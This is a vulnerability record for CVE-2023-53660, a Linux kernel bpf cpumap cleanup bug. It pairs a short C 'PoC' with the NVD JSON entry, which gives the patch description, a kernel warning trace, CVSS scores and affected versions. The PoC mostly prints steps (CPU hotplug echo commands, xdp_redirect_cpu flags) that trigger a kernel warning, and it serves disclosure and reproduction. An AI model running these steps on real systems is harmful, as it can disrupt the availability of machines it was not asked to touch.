CVE-2023-53660

// PoC for CVE-2023-53660 - Trigger BPF cpumap skb-mode cleanup bug // This requires root privileges to load BPF programs #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/resource.h> // Steps to reproduce: // 1. Enable stress mode in xdp_redirect_cpu // 2. Use skb-mode for cpumap // 3. Trigger CPU hotplug or cpumap entry removal // 4. Observe kernel warning: "Incorrect XDP memory type usage" int main() { // Increase resource limits for BPF operations struct rlimit r = {RLIM_INFINITY, RLIM_INFINITY}; setrlimit(RLIMIT_MEMLOCK, &r); printf("CVE-2023-53660 PoC Trigger\n"); printf("Run xdp_redirect_cpu with --stress --skb-mode flags\n"); printf("Then trigger CPU hotplug to cause cpumap cleanup:\n"); printf(" echo 0 > /sys/devices/system/cpu/cpu1/online\n"); printf(" echo 1 > /sys/devices/system/cpu/cpu1/online\n"); printf("Check dmesg for: 'Incorrect XDP memory type usage'\n"); // The actual trigger requires: // 1. xdp_redirect_cpu from samples/bpf with --skb-mode --stress // 2. CPU hotplug operations to trigger __cpu_map_entry_free // 3. The prematurely stopped kthread leaves skbs in ptr_ring // 4. __cpu_map_ring_cleanup misinterprets skbs as xdp_frames return 0; }

{"cve": {"id": "CVE-2023-53660", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-07T16:15:49.697", "lastModified": "2026-02-26T23:12:59.620", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf, cpumap: Handle skb as well when clean up ptr_ring\n\nThe following warning was reported when running xdp_redirect_cpu with\nboth skb-mode and stress-mode enabled:\n\n ------------[ cut here ]------------\n Incorrect XDP memory type (-2128176192) usage\n WARNING: CPU: 7 PID: 1442 at net/core/xdp.c:405\n Modules linked in:\n CPU: 7 PID: 1442 Comm: kworker/7:0 Tainted: G 6.5.0-rc2+ #1\n Hardware name: QEMU Standard PC (i440FX + PIIX, 1996)\n Workqueue: events __cpu_map_entry_free\n RIP: 0010:__xdp_return+0x1e4/0x4a0\n ......\n Call Trace:\n <TASK>\n ? show_regs+0x65/0x70\n ? __warn+0xa5/0x240\n ? __xdp_return+0x1e4/0x4a0\n ......\n xdp_return_frame+0x4d/0x150\n __cpu_map_entry_free+0xf9/0x230\n process_one_work+0x6b0/0xb80\n worker_thread+0x96/0x720\n kthread+0x1a5/0x1f0\n ret_from_fork+0x3a/0x70\n ret_from_fork_asm+0x1b/0x30\n </TASK>\n\nThe reason for the warning is twofold. One is due to the kthread\ncpu_map_kthread_run() is stopped prematurely. Another one is\n__cpu_map_ring_cleanup() doesn't handle skb mode and treats skbs in\nptr_ring as XDP frames.\n\nPrematurely-stopped kthread will be fixed by the preceding patch and\nptr_ring will be empty when __cpu_map_ring_cleanup() is called. But\nas the comments in __cpu_map_ring_cleanup() said, handling and freeing\nskbs in ptr_ring as well to \"catch any broken behaviour gracefully\"."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.15", "versionEndExcluding": "5.15.126", "matchCriteriaId": "8011DFC1-0488-4888-A379-BCB1C11E1F5C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.1.45", "matchCriteriaId": "A0CA013D-55AF-4494-A931-AFC8EA64E875"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.4.10", "matchCriteriaId": "7BB0D94C-4FCE-46F4-A8D4-062D6A84627A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.5:rc1:*:*:*:*:*:*", "matchCriteriaId": "0B3E6E4D-E24E-4630-B00C-8C9901C597B0"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.5:rc2:*:*:*:*:*:*", "matchCriteriaId": "E4A01A71-0F09-4DB2-A02F-7EFFBE27C98D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.5:rc3:*:*:*:*:*:*", "matchCriteriaId": "F5608371-157A-4318-8A2E-4104C3467EA1"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.5:rc4:*:*:*:*:*:*", "matchCriteriaId": "2226A776-DF8C-49E0-A030-0A7853BB018A"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/7c62b75cd1a792e14b037fa4f61f9b18914e7de1", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/937345720d18f1ad006ba3d5dcb3fa121037b8a2", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/b58d34068fd9f96bfc7d389988dfaf9a92a8fe00", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/cbd000451885801e9bbfd9cf7a7946806a85cb5e", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}